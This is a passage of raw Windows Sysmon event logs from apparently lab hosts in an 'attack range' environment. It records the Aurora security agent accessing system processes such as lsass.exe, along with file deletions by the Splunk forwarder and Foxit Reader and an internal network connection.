Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046197Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.932{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046196Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.927{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046195Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.925{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046194Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.922{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046193Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.910{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046192Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.906{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046191Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.900{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046190Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.897{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046189Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.896{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046188Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.894{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046187Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.862{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046186Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.851{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046185Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.847{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046184Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.835{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046183Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.827{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046182Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.816{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046181Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.807{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046180Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.787{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046179Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.778{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046178Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.767{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046177Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.759{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000046176Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.742{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D6668D9FD06108A3656FC8977AAA966,SHA256=2ECB3C480EBA505E3071B3C9F4C78717FA294C0A9C056740531532F56297BB68,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046175Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.701{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046174Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.699{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000018449Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:11.178{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA71ECC9206439964134AC57A0C0FABE,SHA256=125A126B2FEF43C7C9C15DC6DB1E067E089593648F550A83DD3A358EECF2F15C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046200Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:12.785{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFF2E0AD14CB79A28453CFBFF10227FD,SHA256=1EEC6E5F57D5EC1AFC69A60E1A046E93677AF2E5120D2A0B71629A60B17976E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018450Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:12.241{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97486B3A0EDB483D1F83144D0D189A37,SHA256=A5A3342FD23F7D5702200D596C329F509510945474671029F0881A8D27F4BC32,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000046199Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:12.245{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000046201Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:13.888{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCE58F2CE1CFA3C27A55C6729BB731B3,SHA256=07B537E83ADD44F1593AF4CD4471CBCA30D1BD34C54844F4C51F5E3A9E7B5082,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018452Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:11.083{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50181-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018451Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:13.319{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9C359B1E57F60E703729F403B8838C3,SHA256=270DD2AD3738F5E23263F2A04BF4F6188476DFE9160DCE16ED0DAD898DEBBB65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046230Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.986{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EF575F0A30F60069F4AB5454EC35C16,SHA256=45D92D372EE73EB0AFC4B703DAC3123DB9E54A6C57870720217B44079726936B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046229Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.972{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=29F1611F6D523800A76046BE9F8A4257,SHA256=3684E1996733476EDEB96EB1A7E24B897BD73E71F70012B4276881B4047DA818,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046228Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.961{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=B474FCF22DD0B2558B8D6739428D6BE1,SHA256=705778BD6BD219FD479BDC662BD958637CF6BF3AFEEEA2D7FC8333B93159B359,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018453Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:14.407{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT 